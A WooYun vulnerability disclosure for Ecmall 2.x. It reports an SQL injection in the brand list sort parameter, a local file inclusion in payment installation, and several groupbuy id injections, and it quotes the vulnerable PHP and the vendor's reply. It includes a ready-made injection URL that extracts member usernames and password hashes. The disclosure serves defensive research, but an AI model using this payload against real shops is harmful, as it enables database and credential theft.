当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-038492

漏洞标题:Ecmall 2.x 多处安全漏洞汇总

相关厂商:ShopEx

漏洞作者: Chora

提交时间:2014-02-28 11:20

修复时间:2014-05-29 11:21

公开时间:2014-05-29 11:21

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-28: 细节已通知厂商并且等待厂商处理中
2014-02-28: 厂商已经确认,细节仅向厂商公开
2014-03-03: 细节向第三方安全合作伙伴开放
2014-04-24: 细节向核心白帽子及相关领域专家公开
2014-05-04: 细节向普通白帽子公开
2014-05-14: 细节向实习白帽子公开
2014-05-29: 细节向公众公开

简要描述:

一处通杀注入,同文件多处鸡肋注入,一处本地包含。累了不看了,体力活。。。

详细说明:

通杀注入:http://localhost/ecmall/index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23
app/my_goods.app.php

function brand_list()
    {
        $_GET['store_id'] = $this->_store_id;
        $_GET['if_show'] = BRAND_PASSED;
        $con = array(
            array(
                'field' => 'store_id',
                'name'  => 'store_id',
                'equal' => '=',
            ),
            array(
                'field' => 'if_show',
                'name'  => 'if_show',
                'equal' => '=',
                'assoc' => 'or',
            ),);
        $filtered = '';
        if (!empty($_GET['brand_name']) || !empty($_GET['store']))
        {
            $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";
            $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;
        }
        if (isset($_GET['sort']) && isset($_GET['order'])) 
        {
            $sort  = strtolower(trim($_GET['sort']));
            $order = strtolower(trim($_GET['order'])); 
            if (!in_array($order,array('asc','desc'))) //依然只过滤了order,没有过滤sort
            {
                $sort  = 'store_id';
                $order = 'desc';
            }
        }
        else
        {
            $sort  = 'store_id';
            $order = 'desc';
        }
        $page = $this->_get_page(10);
        $conditions = $this->_get_query_conditions($con);
        $brand = $this->_brand_mod->find(array(
            'conditions' => "(1=1 $conditions)" . $filtered,
            'limit' => $page['limit'],
            'order' => "$sort $order", //带入查询 order by参数注入.
            'count' => true,
        ));
        $page['item_count'] = $this->_brand_mod->getCount();
......
    }


本地包含漏洞:http://localhost/ecmall/index.php?app=my_payment&act=install&code=wooyun
app/my_payment.app.php

function install()
    {
        $code = isset($_GET['code']) ? trim($_GET['code']) : 0; //没过滤
        if (!$code)
        {
            echo Lang::get('no_such_payment');
            return;
        }
        $model_payment =& m('payment');
        $payment       = $model_payment->get_builtin_info($code); //跟进
        if (!$payment)
        {
            echo Lang::get('no_such_payment');
            return;
        }
        $payment_info = $model_payment->get("store_id=" . $this->visitor->get('manage_store') . " AND payment_code='{$code}'");
        if (!empty($payment_info))
        {
            echo Lang::get('already_installed');
            return;
        }
...... 
}
includes/models/paymet.model.php
<code>
    function get_builtin_info($code)
    {
        Lang::load(lang_file('payment/' . $code));
        $payment_path = ROOT_PATH . '/includes/payments/' . $code . '/payment.info.php';
        return include($payment_path); //包含之.
    }


鸡肋注入:http://localhost/ecmall/index.php?app=seller_groupbuy&act=edit&id=1'
http://localhost/ecmall/index.php?app=seller_groupbuy&act=xxxxxxxx&id=1'
需要开启团购活动
app/seller_groupbuy.app.php

function edit()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤,下面还有很多类似的
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT)) //带入查询
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
       ......
    }
    function drop()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id']; //下同
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT)) //下同
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
......
    }
    function start()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT))
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
       ......
    }
    function finished()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT))
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
        /* 团购信息 */
        $group = $this->_groupbuy_mod->get(array(
            'conditions' => 'group_id=' . $id, //同样带入查询
            'fields'     => 'group_name',
        ));
......
    }
    function desc()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT))
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
 ......
            /* 团购信息 */
            $group = $this->_groupbuy_mod->get(array(
                'conditions' => 'group_id=' . $id,
                'fields'     => 'group_desc',
            ));
           ......
    }
    function cancel()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id'];
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT))
        {
            $this->show_warning('Hacking Attempt');
            return;
        }
        /* 团购信息 */
        $group = $this->_groupbuy_mod->get(array(
            'conditions' => 'group_id=' . $id,
            'fields'     => 'group_desc,group_name,owner_name',
            'join'       => 'belong_store'
        ));
    }
    function log()
    {
        $id = empty($_GET['id']) ? 0 : $_GET['id']; 
        if (!$id)
        {
            $this->show_warning('no_such_groupbuy');
            return false;
        }
        if (!$this->_ican($id, ACT))        {
            $this->show_warning('Hacking Attempt');
            return;
        }
        $group = $this->_groupbuy_mod->get(array(
            'conditions' => 'group_id=' . $id,
            'fields'     => 'group_desc, group_name, goods_id',
        ));
    }

漏洞证明:

1.jpg

2.jpg

3.jpg

4.jpg

修复方案:

过滤

版权声明:转载请注明来源 Chora@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-02-28 11:30

厂商回复:

非常感谢您为shopex信息安全做的贡献
该漏洞通过其他渠道已经提交过,并在处理中
谢谢

最新状态:

暂无

漏洞评价:

评论

  1. 2014-02-28 11:50 | Chora ( 普通白帽子 | Rank:337 漏洞数:22 | 生存、生活、生命。)

    这是挖祖坟的节奏么,去年九月提交的审核了,乌云君审核很敬业啊,都清理到这么远的地方了。